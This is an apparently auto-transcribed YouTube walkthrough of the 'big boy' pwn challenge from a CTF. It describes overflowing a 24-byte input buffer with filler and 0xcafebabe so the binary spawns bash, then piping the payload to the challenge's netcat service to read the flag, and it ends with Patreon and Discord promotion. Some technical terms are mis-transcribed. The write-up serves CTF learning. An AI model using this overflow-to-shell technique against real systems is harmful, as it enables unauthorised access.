 Hey YouTube, this is a video write-up for the challenge big boy from Seasaw CTF in the Pwn or Binary Exploitation category. Challenge prompt is only big boy pwners will get this one Gives us a little net cat command to connect to the real service and a binary to download So if you wanted to you could W get this I just have it in my current directory right now So it is just a 64 bit executable. Let's mark it as executable so we can work with it and run it It says are you a big boy and I'm just gonna say yes And it gives me the date and nothing else to it. So weird. That's all whatever Let's do some reconnaissance look at some strings in here if you wanted to we can see bin date So I must be running that command the same thing we have a bin bash somewhere in the shell and System and read and everything so we've got the potential to maybe try and run bash or run a shell here So what I did is actually I opened it up in hopper and you can download it from hopper app.com If you want to get it there It doesn't cost too much money the free version well the free version obviously it doesn't cost a whole lot of money But even the pro version does not cost that much You can see the strings here if you wanted to jump to the cross references You can just go to main function just like that or check it out in the procedures on the side And then if you have the other version, I don't know if it's specific to The full version or just the regular free version if you hit alt and enter from the current procedure You can see the pseudo code for it. So they give us a main function in close to C And it gives us some variables that it's reading displays it on the screen Are you a big boy tries to read into a variable 30? And then it tries to test if 0x dead beef is equal to 0x cafe Bay if it will if that's true It'll run bash. Otherwise it'll run date So I looked at this and thought that was really really weird because why is it trying to test two constants that are obviously Different and determine whether or not they are equal to each other I thought this was very very strange because it wouldn't have included this comparison Like the compiler wouldn't have even included this code if it was never ever going to get there So I thought something very strange was going on and for that reason I checked it out in another Disassembler I just kind of ran a obj dump on it And if you wanted to you could probably run radar which is a much smarter move But I'm not that smart at least not yet. Hopefully I'll learn a little bit more radar I need to learn a lot more about it, but I just jumped the main function checked it out and then I could see okay It is calling puts it is calling read just as we saw in the pseudo decompilation here for that hopper gave us But after we go ahead and read We're storing the return of it in EAX obviously and then we're going to determine if EAX Is then compared to 0x cafe Bay. So it's something from our read comparison. That's actually determining whether or not we go to Run cmd with bash or run cmd with date So all we need to do essentially is just get this 0x cafe Bay and get it to a point where we're overflowing This var 30 perhaps or what we're actually testing here to run bin bash. So let's go ahead and do that I'm going to use Python here and PON tools. So import PON just to see what This hexadecimal value is in little endian. So we can go ahead and copy that And then we if we wanted to we could use Python to just simply print that out Python taxi print This stuff here and now we have the bytes that we'll go ahead and give to the program We'll give that to big boy But we need to be able to include up to where we're gonna actually start to overflow into var 30 or whatever We're testing to determine if it's EAX and equals cafe Bay, etc. So You can see in the read function here We're actually reading in however many bytes at the very very end or the size and the length here If you want to just pump that 0x 18 into Python again, check out how big that buffer would originally be 24 Okay, let's go ahead and Try and do a little machine gun spread or a little spray to determine what index we actually want What index is actually and give us the leak into cafe Bay here? So what I do in this case is I do a little four I in and then arrange that we want let's go 20 to 28 in which case we can Echo out the occurrence that we're working on and then print out a times the dollar sign I and the value that we're working with here and then our Obviously the cafe Bay that we want all the way and pumped in here and let's do done Hopefully, I know me saying that allowed didn't make much sense doing a for loop to just iterate through numbers where we could possibly hit and Grab the EAX get the position filled with cafe Bay and we'll run bash instead of date And I'm just testing which number are we actually not going to receive date on so I wanted to display it out on the screen with echo our iterator here, so I run through this crank crank crank and 28 27 all of these occurrences. It looks like we're still getting date displayed So 20 obviously does not have date displayed. So, okay, maybe we can just say print a Times 20 and then add in our exploit there and It doesn't display date. So it must be trying to open up a shell for us, but it's being closed immediately So what we have to do is kind of capture it try and hold it because once bash once that shell opens up It's waiting for input from standard input, but we're using a pipe here and we pretty much just killed it So we need to capture it a cool way. We can do that is just go ahead and grab after we have the payload Cat so standard input will remain open and then we can actually work with the show that we've got here So I just wrap that in parentheses and use a semicolon to separate the commands here And now I can run LS and I can run who am I and I can cat flag if we were working with the real net cat service So let's go ahead and do that. Let's take it this exploit or this payload so to speak not really an exploit here Let's go ahead and pipe that to the net cat command that we're given So we're working with the remote service now Not just our local binary and then once we're given are you a big boy? We have supposedly a shell that we were able to work with so we can check out art dot text We can do whatever we want to do say who am I but obviously there's a flag here. We want to grab so let's cat flag dot text And we've got the flag sweet You can go ahead and save this if you want in a flag dot text paste in there and make sure we've got some work for it If you wanted to maybe save this it's just like a simple get shell script or something so you don't lose track of your solution But The real takeaways from this is simply using pwn tools And if you didn't use pwn tools to get zero x cafe bay in little andian You can do it with the struct module in python because that's built in you don't have to install pwn tools for that You can just do struct dot pack and then as a string with the format Specifier the less than symbol for little little andian and then capital i for integer Paste in our hex value as the other argument and we've got again little andian representation of it So we can print out the raw bytes cool Hope you guys enjoyed this one. Hey quick shout out to the people that support me on patreon This list is getting so much longer and it's incredible. It's really surreal. So thank you guys so much I can't say it enough $1 a month on patreon will give you a special shout out just like this at the end of every video $5 or more on patreon will give you early access to everything that released on youtube before it goes live So if I record a bunch of videos in bulk and then I usually just have youtube like Gradually schedule them to be released over time. You don't have to wait You can get the content right when it's ready just $5 a month Thanks If you did like this video, please you like comment and subscribe join our discord server It's in a cool community full of ctf players programmers and hackers We're gonna be playing a lot of cts together We're actually trying to form when we can and when it's okay to like a big discord team And otherwise we'll just divide Into smaller teams to place some games that have a team cap So what are we looking at seesaw red coming up this weekend? We're gonna be looking at pico ctf and everything else that's coming down the pipeline So please do join. We're gonna have a great time Thanks again guys. Hope to see you on patreon. Hope to see you in the next video. Love you. Bye